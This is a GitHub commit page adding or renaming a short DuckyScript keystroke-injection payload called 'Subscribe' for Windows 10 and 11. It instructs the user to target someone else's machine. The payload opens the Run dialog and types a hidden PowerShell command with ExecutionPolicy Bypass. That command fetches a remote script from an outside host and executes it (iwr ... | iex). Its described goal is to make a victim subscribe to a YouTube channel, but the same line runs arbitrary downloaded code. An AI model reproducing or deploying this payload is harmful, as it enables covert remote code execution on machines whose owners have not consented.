Rename IWR-Subscribe.txt to Subscribe.txt

This commit is contained in:
I-Am-Jakoby 2022-12-18 14:31:47 -06:00 committed by GitHub
parent 6244fbc63f
commit 0c06328b75
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,15 @@
REM Title: Subscribe
REM Author: I am Jakoby
REM Description: This payload is meant to make your target subscribe to your youtube channel
REM Target: Windows 10, 11
REM Remember to replace the link with your link for the intended file to download
REM Also remember to replace the URL with your own
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $channel='youtube.com/iamjakoby';iwr jakoby.lol/wj4 | iex
ENTER